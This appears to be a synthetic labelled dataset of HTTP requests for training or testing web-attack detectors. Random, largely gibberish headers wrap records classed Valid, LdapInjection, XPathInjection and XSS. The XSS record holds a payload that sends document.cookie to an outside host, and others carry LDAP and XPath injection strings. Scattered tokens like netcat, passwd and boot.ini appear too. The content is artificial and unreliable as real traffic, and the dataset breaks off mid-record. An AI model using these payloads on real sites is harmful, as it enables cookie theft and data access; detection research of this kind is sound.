Cookie2: $Version="4"
Date: Thu, 08 Jul 04 21:54:30 CET
ETag: "Dd5MBEp1RkTm.bHVt"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Thu, 17 Feb 05 09:30:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8005
MIME-Version: 8.0
Pragma: hae6f='n6hco6'
Proxy-Authorization: NTLM cndwb3RsbDd0ZGh1MGpudWRhYXFkcmVpaWFhZWJhaTZpbm9sZVVBdHV0NXI2ZGE=
Authorization: NTLM czB1NG9hYjd0b3RmcnQ4ZWRlZW5venRpNGVyZWl6c254YXNlZXpmbg==
Range: 340098-821
Referer: http://or9n.de/tdena/heuqp.fgf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 7.7; 5r-ma; rv:9.0.5) Gecko/58317148
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 8.2 www.Ynzjeoew.jpeg, 5.5 162.19.106.69
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 312 103.181.43.135 "neoicnFqurorecs" 
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 34361564811
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41814
Start - Id: 6832
class: Valid
PUT /lStetNe/HU4eCgOErm3d-ng/mI/F8Mwindow.openHsc8e.js? HTTP/1.0
Content-Length: 130
Content-Language: 1aaapiqi
Content-Encoding: compress
Content-Location: /sEeekA.jpeg
Content-MD5: cmVlWjc1cm9oZUVlbm1lNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 May 07 13:50:49 GMT
Last-Modified: Mon, 28 Dec 09 19:46:06 CET
Host: 88.247.12.228
Connection: ajhoue1a
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: vRcu0o=nt
Client-ip: 101.130.74.185
Cookie: BQautoexec.oxoS=n8srt;drnPsedhimEtcr=irrnE;hos=;E;ix=ee9ocTt
Cookie2: $Version="814"
Date: Mon, 14 Jul 08 21:23:54 UTC
ETag: "1K0_HNsmKAwEYJXt"
Expect: ncb3=eoe1d;ItjdSlid
From: eoemjo3e@Ttqmn.cz
If-Modified-Since: Tue, 13 May 08 10:26:17 UTC
If-Unmodified-Since: Wed, 21 Dec 05 21:09:41 CET
If-Match: *
If-None-Match: "go.Bs_JRa7e1_aU2"
If-Range: Sun, 15 Jan 06 05:27:07 UTC
Max-Forwards: 108
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest qop=forei
Range: 708-,54-
Referer: /hPt1hs/etHe/eiairai/meehse/st8yaaeu.jsp
TE: chunked
Trailer: Accept-Charset
User-Agent: rH7aF3vApC http://www.emh7rhns.biz
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 302x0187
Via: FTP/0.9 www.sve3eht.png:475
Transfer-Encoding: identity
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 912 84.206.83.150 "a7hihrekexzr7" "Fri, 16 Feb 07 11:59:14 UTC"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 7804793721696568592
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

rmj.BaqO=r2NZU&jDMg=a2wQUa6yAe&esdanilaO0gi=2&pcyutiy9aos5ilz=hrafo7tn&Eoi=17532231&enFaK=9798&awba=o84t&esrenasiaeos=gkrmumgO5Dw6

End - Id: 6832
Start - Id: 1518
class: Valid
GET /moI6@PB_vamM4qn3mn/nted8/DebT9oi18pvt01w/rerouujrgro6o/xml8Y1.jsp? HTTP/1.1
Host: www.sh2otdse.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: h9r0-ak;q=0.4, aainYefd-eqRfqir, taoa7fos-3ntqtosA
Cache-Control: nl4=aleRq
Client-ip: 4.21.42.224
Cookie: elslmo=6 ;8eaihhEnnht1=\)m/pshwopenrp%seooi;ott4elO=37359607;hmnboa7riE6sor=8986;dtpeihhbwg=EEeimeaeatguG
Cookie2: $Version="758"
Date: Tue, 08 Jul 08 05:46:49 CET
ETag: W/"-SybIIL8X_BGa1v5Fi"
Expect: 100-continue
From: sctinh@65Ad.st
If-Modified-Since: Mon, 20 Jun 05 21:45:08 CET
If-Unmodified-Since: Wed, 16 Mar 05 23:04:12 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Nov 09 04:42:58 GMT
Max-Forwards: 363
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: Digest response="fC42afC4ecDca5f7d734CDFBECD3Baaf"
Range: 460-9787,-3
Referer: /edoi/epuhme.cfm
TE: deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.6 (compatible; ehsMeI; WinNT; essat0lsam)
UA-CPU: PowerPC
UA-Disp: 715,461,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4503x489
Via: 9.3 www.x9ecShe.js
Transfer-Encoding: identity
Upgrade: oona/0.9, wHted/5.5, mcbtI/0.9
Warning: 412 www.hbucErDi.htm "tuhhCealteMaoopehz" 
X-Forwarded-For: 254.197.114.234
X-Serial-Number: 729013897214
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1518
Start - Id: 5568
class: Valid
PUT /s2MdIz_wHj0Y/ebsmUu_ewN3ta2/orkoRckn5nemsiGeGm/ecenibhoBacsnpae/eA/sZ-LjddkL.mdb? HTTP/1.1
Content-Length: 308
Content-Language: ed,ntewa,gtsM
Content-Encoding: gzip
Content-Location: http://www.nesii.it/8sm3/subhpn/tkiAtem/s4c5u/yeyi.exe
Content-MD5: bDFnZXB0dHJpZWF0cmM2VA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Nov 05 13:23:32 GMT
Last-Modified: Sat, 26 Jan 08 01:08:10 GMT
Host: 130.5.89.200
Connection: 20cfp
Accept: */*
Accept-Charset: x-mac-icelandic, windows-1253;q=0.1, x-mac-icelandic, iso-8859-15
Accept-Encoding: 
Accept-Language: hDryoyh-Siny3;q=0.3, leagnhu-rie, lhnet2-eeeoibOf;q=0.6
Cache-Control: eetl1=kwb
Client-ip: 162.107.11.157
Cookie: aopdxcshnmTu=isdechieeetp;Azdthp=423892;4r9M614jH=as2X;nreRh6nn=uI;eec=018
Cookie2: $Version="811"
Date: Sun, 04 Dec 05 07:42:14 CET
ETag: "jRNNrlKSM.X966cv"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Wed, 08 Aug 07 03:08:33 UTC
If-Unmodified-Since: Sun, 27 Aug 06 08:48:30 GMT
If-Match: "KlcqpPxg59s5fCY"
If-None-Match: *
If-Range: Mon, 24 Aug 09 10:36:33 GMT
Max-Forwards: 7334
MIME-Version: 8.0
Pragma: qtgnd='tirDeiI'
Proxy-Authorization: Digest realm
Authorization: Digest response="109ba8FA60c5B2AaD6D46df6E7Cc4549"
Range: -97243,-59
Referer: http://Hsml.it/csag1/rawc/oesttdOg.js
TE: deflate
Trailer: If-Match
User-Agent: ttcEwi1tMd (eZ@N-w)
UA-CPU: x86
UA-Disp: 266,600,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6340x801
Via: HTTP/3.7 255.69.246.147, 9.6 159.62.161.17, 3.1 www.Typlho.htm
Transfer-Encoding: reftes
Upgrade: 4rlr/0.3, gsobha/3.9, R5tyi8/0.2
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 07654558799930280172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

mo9ecxeihatsf=7665855&S.drATp=11&mt7iiatii=14&obB7es5syn=7545&fsg7boot.iniCU3between=t3e)staeaateO&netcatqX0-Aqy3=i&fillA=a00OTMeN&s8eahrhdos=9aands~entelnet+9&tt8Gat1alsOo2y=m?hrn iip&5AservicesPdstdin7H=>etelnett&1iridg=h9iyepsystqiihube&R2p--VWVb6Xx=ar7osti&oSpunbiebrI=b0rrt&ozleni=sSE9wHF-rVx4

End - Id: 5568
Start - Id: 15386
class: Valid
GET /olttt/zgnjnaeW5jaa/ikdbs1/SJsystemnetcatwDm_c/@B1eadmin/uoNiyt.tiff?aYoFa0ngtl=sbdS+ndrand%7Ersrtedn HTTP/1.1
Host: www.e7nNh.de
Connection: lBT3
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic, gb2312, koi8, iso-8859-4;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 32.88.148.234
Cookie: CqtsnwRUl=7469331616;UTA.ji=0942;s.Gg4=lEdei;rctnsdls=15154
Cookie2: $Version="5"
Date: Mon, 21 Sep 09 05:08:35 GMT
ETag: W/"d@.lhoUPWXbNxK2x06H"
Expect: taS04eor=niqoa2A
From: geinl@l3cifnrd43.fr
If-Modified-Since: Wed, 21 Mar 07 19:46:08 CET
If-Unmodified-Since: Thu, 02 Apr 09 05:49:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 082
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: l7kr5 aism8h=ekiama5a
Authorization: Digest response="4fee8dA8B1AAdBaceba7687A41A1FaD6"
Range: 96924-,-3,41-800
Referer: /qNAsnyit/twrrrmpn/5beb.jpg
TE: gzip,deflate
Trailer: Connection
User-Agent: c3slaiencas47a8eL
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: aoqRt/8.1 www.ireer.jpeg
Transfer-Encoding: deflate
Upgrade: ajwlas/3.1, qwr/3.1, 489/9.8, uqmyew/2.2
Warning: 532 159.244.10.133 "TerrilhnkEteealty" 
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15386
Start - Id: 38292
class: LdapInjection
GET /sgtrsSdb03stbig0sHnE/r8ue/h7b9n82SKye9JEx/entmyihiEndxiwxin/nhup/d94PWjgtkrwUnll/hhu/l3Toydtc/eyR-10H6EO-JyK.tiff?JfklS=drops%7C&sod=oSeiuaohhMssen&oseft=36427858&hay=%29%28+%7C+++%28rtest%3Diw*%29&TtaItwo6trdo=otad%3Bnosima HTTP/1.0
Host: www.ood5.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-cn;q=0.3
Accept-Encoding: 
Accept-Language: ae-7ssOo, oSoutu-it4h, hg-prHfme
Cache-Control: no-store
Client-ip: 29.13.37.141
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="436"
Date: Tue, 12 May 09 09:36:28 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: *
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: Fri, 10 Apr 09 15:08:44 GMT
Max-Forwards: 7767
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: /zcbiStEa.mpg
TE: deflate;q=0.5,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: dlhreemt
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 8.4 www.5foeno.html:3, HTTP/0.6 157.33.222.250, FTP/1.5 www.kAder.html:511
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38292
Start - Id: 47829
class: XSS
GET /tj7OUZ1w1WXyug-2y/GukjSGdIKiX4zg/m-bWe.clibdtmp/nseyelLso5ter/oqycYu/Neahasb/v1qV/yes4j.bin?P64eENoL1o=24038&sock_streamjG4s=uyautoexecTLuicikg07%5Deit&oeanmawn=343724&iEajm=agnfs3ucsEnobfe&7doeu1dwnoIrhv=5yMdFa&tty1e=bhe&DoOeger=objectoxus&ioehmtaDksfirh=thavinge5otRoa&dooi8l=scriptcu%40+&sroreroci7des=edi&c9epiioi6=%3Cdiv++style++++%3D++%22++width%3A+++++expression%28%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.orongeon.com%2Fcgi-bin%2Fliaril.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B++++%22++%3E&EMIFZO=+beMh+&geiedl7y=fo%3D HTTP/1.1
Host: www.erw2oy7eo.ch
Connection: wrossamr
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.9, identity
Accept-Language: utacemo8-ht;q=0.7, oeHq5-oeiTs, yskps-n2ycie;q=0.4, i7hrl4-ieomtler
Cache-Control: max-stale
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="540"
Date: Sat, 12 Mar 05 03:57:27 CET
ETag: W/"OurwtpibD7A0noXC"
Expect: 9uzxe
From: easla@ssNseiT.it
If-Modified-Since: Fri, 11 May 07 11:05:19 CET
If-Unmodified-Since: Sun, 24 Feb 08 06:15:51 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "m1JK9pR8yar7L562uPv8"
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 672
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: Basic c29MVFRUczE6YTdybWM=
Range: 44-,80-
Referer: http://www.udaHi.ch/ac6ttDe.asmx
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: ihuln/7.4.7
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: HTTP/5.8 www.Bjtkamn.css
Transfer-Encoding: deflate
Upgrade: liEh/2.4, ahen5/4.1
Warning: 325 www.lmdi.jpg "lP9i9" 
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 9590934365378
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47829
Start - Id: 23620
class: Valid
GET /dzb@/daedao0o/iuen.jpg? HTTP/1.1
Host: 14.39.253.104
Connection: Dndo
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: tnc-emlr, eaSC-ahzd, d-iaoe;q=0.9, nalotnT-s, qhy-93;q=0.1
Cache-Control: min-fresh=2331
Client-ip: 88.47.180.4
Cookie: pdrmVGEtFincludeh=4531403;n5e6aT5tBdvo=se(;8omsOlt=rtt2e;eval6.Z=ieewttn O;0ttespiOsaABc=P 
Cookie2: $Version="8"
Date: Wed, 24 Sep 08 06:50:58 UTC
ETag: W/"q-l_SQPwp.BdHFYyrHE."
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Tue, 14 Apr 09 11:35:15 GMT
If-Unmodified-Since: Mon, 30 May 05 03:41:51 UTC
If-Match: "GRR1P2K9KYUbKhZEU"
If-None-Match: *
If-Range: "Rt5rfcHZQtAc_Bxc"
Max-Forwards: 41
MIME-Version: 1.2
Pragma: r0nel='orCehiih'
Proxy-Authorization: aoteR iyibes=enaqlb
Authorization: NTLM bXJjZWVhdG1ydGk3ZWxvY0xuZXQ4dU9kTG1zZ1EyMncwb3JNbmVwaW5zcg==
Range: 50-
Referer: /fdat9ins.tar.gz
TE: deflate
Trailer: Connection
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 7.4; io-lw; rv:1.3.2) Gecko/51709028
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: HTTP/0.6 42.226.203.80:2133, 6.9 58.52.237.216, vo2o/1.6 www.et86e7n.png
Transfer-Encoding: compress
Upgrade: gktu/1.0, isTtr/8.1
Warning: 271 126.64.164.69:05658 "3ffD5oti2in" 
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 53864055
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23620
Start - Id: 20590
class: Valid
GET /bA/teltrGetiuoiiaueeo0/sXAE/atAUmn@qOhOq@tjP/rAwn9pgynSSi7hWhdneL/lvaaltd4xqvhoKo.exe?pfoeldiHhTSpl=eoet+s46smmochafs%5COModt&nih=o&nq_passwdlbKt@L=oS%2B&yiconi1et=rehtpasst%3AeKn5h%3At&fLnnjltrsiotio=%5Co4o++gstO HTTP/1.0
Host: 162.114.189.88
Connection: close
Accept: audio/*;q=0.7, text/html, image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eereas-s5XttnIr;q=0.2, t7iosqa-uNnru;q=0.0, d-job
Cache-Control: only-if-cached
Client-ip: 208.232.197.213
Cookie: olmhto8uo8EceeX=gotantebnhm nSa[Ovsc;jeeriF= ;sSeeazeMoeiP=8t8nFdeaotUr;t5jToig=0;vmt9h= >;andm=267
Cookie2: $Version="5"
Date: Tue, 24 Nov 09 04:58:04 CET
ETag: "y2IzXYQmaW4pbbLdCKr3"
Expect: 100-continue
From: er9oa@3ehh.fr
If-Modified-Since: Tue, 04 May 04 12:22:12 GMT
If-Unmodified-Since: Sun, 05 Mar 06 11:27:40 CET
If-Match: "L65QcQ.983S@ObP0"
If-None-Match: *
If-Range: Sat, 23 Oct 04 07:27:41 UTC
Max-Forwards: 689
MIME-Version: 6.7
Pragma: odr=jXtou
Proxy-Authorization: Basic dXQ0bXJpYTpydGFydW5y
Authorization: Digest nc=2bca92A6
Range: -0,76447-3193
Referer: http://www.itsDu.uk/neazT/rely/mhietftA/tMitT/odna.png
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 2.4; 9y-ri; rv:2.4.5) Gecko/96758551
UA-CPU: StrongARM
UA-Disp: 265,2929,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1074x5578
Via: nl3ehu/5.1 www.hierrwhd.html
Transfer-Encoding: compress
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 085 www.nNmehRA.gif "mrtsh7o" "Wed, 07 Feb 07 15:55:05 GMT"
X-Forwarded-For: 16.249.84.121
X-Serial-Number: 999844116491308
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20590
Start - Id: 49791
class: XPathInjection
GET /ocuhttHeWtqbth4temhb/oKkHX.5-hYK/qDKjev5K.A.asmx?irnnnl=28a+mr5aocwi+96tl&egbeszwnf7=9pe&FM2zKTX10Iwx=betuda7rrgenix&7TQrQ3f=c%409&lalO4jgidthi=ldnX5Kk&eni=htbnzsli47k8lknlhd&sdse0nT=92&Ayldiundtp0=58360019&crsPu=tu4r6eno%27+++++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+++i++++%2B++j+++%2B++k++%2B+++l+++%2B++1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++%27ooIgon%27%3D+%27+++X6ocifyE%27+++++or&ldeleteKYyIatf6Uq=64783506&retneNdriae=nasoo3ttnIhna&2rfeC=1&mreyash=%253m&yaanirregbOnmb8=uJlyQB&tm=3Dfregns3aItuba2 HTTP/1.1
Host: 253.124.99.51
Connection: wqin
Accept: text/plain;q=0.0, application/*;q=0.0, video/*;q=0.8
Accept-Charset: isiri-3342;q=0.8, x-mac-chinesetrad, euc-jp;q=0.0
Accept-Encoding: gzip, compress;q=0.5
Accept-Language: nphe-ti8;q=0.1, o7Maen0R-teuaEeo0;q=0.8, bn-E8wvLs;q=0.6, e-Ic
Cache-Control: no-transform
Client-ip: 140.31.18.95
Cookie: Y9Atlga=ilgmethtaccesid
Cookie2: $Version="30"
Date: Tue, 02 Dec 08 16:38:41 CET
ETag: W/"8Nw-K59c314vRFuXk"
Expect: o7eBsmo9
From: soenml@saae0wd.org
If-Modified-Since: Wed, 13 Jun 07 22:12:45 GMT
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: *
If-None-Match: "XQEPajdmxpZtqu1yBy"
If-Range: *
Max-Forwards: 2835
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic em9mVks6c3JuaWVuZmU=
Range: 1-,586-,-3399
Referer: /qndee33/ooeuOe/agbhe/dwsge.tiff
TE: deflate;q=0.8
Trailer: Connection
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 5.7; Al-9s; rv:1.8.2) Gecko/98966415
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 742x2872
Via: blani/4.6 229.12.67.27, FTP/6.6 www.Ng5s2.shtml, 9.5 250.149.189.69
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 559 www.lsvsyy.js "dlsdohma" "Mon, 19 May 08 07:26:31 CET"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49791
Start - Id: 17256
class: Valid
GET /sgt3slt0f/kdshsIzdAbkdinngsqhy/aanNesUn7s/CYLE8d8sr/hcbDmajYtA6l/et_XNib4ubtBYaBxQ2/ojy/Serieaa/likeUfbj.php3?xrIuaunisa7cdr7=zinnneishx&aefn3p6tpu=0&1gNssOd6c=46597653&conto=zFyvC&eyTsmnasb=r3ikesHnsdxapteo HTTP/1.1
Host: 18.39.24.13
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis, windows-1250, ks_c_5601-1987, euc-kr;q=0.3
Accept-Encoding: 
Accept-Language: ege-9;q=0.8, eyqosaoh-er1daho;q=0.6
Cache-Control: eneMQsdo=leow
Client-ip: 153.216.113.201
Cookie: ia2oeehhwmcil=rnee7s1iZ ;PCKpKNY_vbscriptL8=echodeen5ht;ytoicw=se';dSs@BMFlike-nph-d@=E1l0Eow1eanllrqh
Cookie2: $Version="6"
Date: Thu, 29 Dec 05 10:12:42 GMT
ETag: W/"8YnfclA.qLuWV-byX"
Expect: s3sfseb9=eog84p;tHio0o=j0ta
From: 51hi@hb0porCAre.cz
If-Modified-Since: Sat, 13 Dec 08 24:38:38 CET
If-Unmodified-Since: Sat, 04 Dec 04 16:24:36 GMT
If-Match: *
If-None-Match: "KYONNLYXwmksuLrju"
If-Range: Fri, 28 May 04 18:52:36 CET
Max-Forwards: 66
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: Basic YWRzbmU6a25nZXJYZUk=
Range: -986,9134-
Referer: http://RYIes4UE.st/7n0o/3ohniU/eLTial/eaenSl/Ee8een.msf
TE: chunked
Trailer: Via
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 8.1; O2-tc; rv:8.3.5) Gecko/50244247
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 425x7082
Via: eyn/7.1 www.erent.jpg, 5.5 125.144.50.230, zniae/1.7 179.28.102.168
Transfer-Encoding: deflate
Upgrade: e7eli/6.7, 5Tued/6.2
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 835471798337
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17256
Start - Id: 16251
class: Valid
GET /rHIuHGJ8QwSYv/bf41R8kl1O_.uyTb1wx/nDtj0FwZDlihsGtli-c/e.13fGT/qaMs@UvEr/U0r59gt.Vi97TKY/xcymi/eooCfW.e@hlShFQWG.jsp?ehfsoreae=an%2Fhacey+i&lBujcti=6fdbOeyELKyv&plk1r=726&sh0en=ajclinkvggseas&oEoZ=6atsew%5Cqetbp69netcatm%3C&o8ideo=eRmetanr-ee5f&ua1Tonistgmdtsr=00274818&eeAssnh9ie0sf1=oe-systemyT%3Ajl&tAbnotur=oe9xV&ieyrIie=dniuna&fU7-cmdUqb1U7=7&eetO1crt3iaoe=r+%3Cr+e1a%7E&s5=nh8TOocnrxmlaphridet&tmna=4vxtseiiohboy4sz3f HTTP/1.1
Host: 222.238.146.54
Connection: tnojfyi
Accept: image/*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.3, gzip, identity, identity
Accept-Language: ne-Gsotdam;q=0.6, xrecAa-ot
Cache-Control: no-store
Client-ip: 191.163.75.118
Cookie: bcT0=7;so1mDAtyti=4;dat5ttVc7=Eenkhmeu;Aaiieldtte=ere6safTwfI
Cookie2: $Version="29"
Date: Sat, 05 Dec 09 06:27:58 CET
ETag: W/"xNt8NPfOH10qUQS4hs@6"
Expect: dlaR8Oyp=nka2o;eywn
From: Tcnle@algheiet.net
If-Modified-Since: Thu, 01 Jan 09 16:32:15 CET
If-Unmodified-Since: Fri, 30 Dec 05 09:05:56 GMT
If-Match: *
If-None-Match: "sgDu8EMA7BGX3KCc7ku3"
If-Range: Tue, 08 Jul 08 14:05:33 GMT
Max-Forwards: 6616
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="sldh8rh"
Authorization: Basic Nmx0aWhpeTpFaW9nOQ==
Range: 820-,56899-18941
Referer: /sotoe/ttananT8/rJi3o/AkTgii/trhee.dll
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: kger5eo
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2602x876
Via: 0.3 www.eMmdenr.tiff
Transfer-Encoding: identity
Upgrade: nysit/9.1, rnf/8.6, enSRLt/9.3, tIaii/5.9
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16251
Start - Id: 8371
class: Valid
GET /w3-r7N4Dx0d.mspx? HTTP/1.1
Host: 240.80.81.72
Connection: ejeg
Accept: */*;q=0.7
Accept-Charset: euc-kr;q=0.8, windows-1255;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=19
Client-ip: 61.171.219.80
Cookie: amwereaegojdw=rnfsOcE@Zw;cwtef37enldoi3=1Eifddt7rs0replacej;vdue3snmomeCHrn=ta;S2CpCAM6rexml=ameY;Rdhtsieuys=egoNoR
Cookie2: $Version="42"
Date: Tue, 20 Jun 06 22:00:52 GMT
ETag: "WpS3uxa6LzLxZ6Dbp"
Expect: 100-continue
From: Sbzn@cs3acOiarn.org
If-Modified-Since: Wed, 01 Nov 06 23:28:26 UTC
If-Unmodified-Since: Mon, 22 Aug 05 18:56:21 CET
If-Match: *
If-None-Match: "-t-_Y_aZR13MoflaeGir"
If-Range: Sat, 27 Nov 04 06:53:30 CET
Max-Forwards: 4
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest qop=8rne
Authorization: iE5ss r8Etm=5dsd
Range: -3949,19472-179474,-83888
Referer: /swtl2/oIttonsm/tafA/fsUrtca.css
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/2.4 (compatible; Konqueror/5.7; Linux i586; anAiaonb; vmEeetVs; shjrn)
UA-CPU: 68000
UA-Disp: 283,560,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6131x831
Via: FTP/5.6 www.5nrr.gif
Transfer-Encoding: compress
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 482816
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8371
Start - Id: 4013
class: Valid
PUT /oeaeu9hw/QJ8/oE2TOWf576PtWPi/T6Pcmd4LNWHZ/re0ntsF7Oe2we4/o1DzAQJ/hkBScWJ4c/fr8MhNI5VdITJcUE/tufapiTalB/eMvDo8A0nBD/wGWWJHlJWw2Pbb.png? HTTP/1.1
Content-Length: 24
Content-Language: he,yhce2ue,het
Content-Encoding: gzip
Content-Location: http://liaeR.st/hrFyhsrc.php3
Content-MD5: cmlldGM4dGd1c1RvZW5wbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Feb 05 15:34:52 GMT
Last-Modified: Fri, 09 Dec 05 11:00:16 CET
Host: 195.151.148.115:06
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
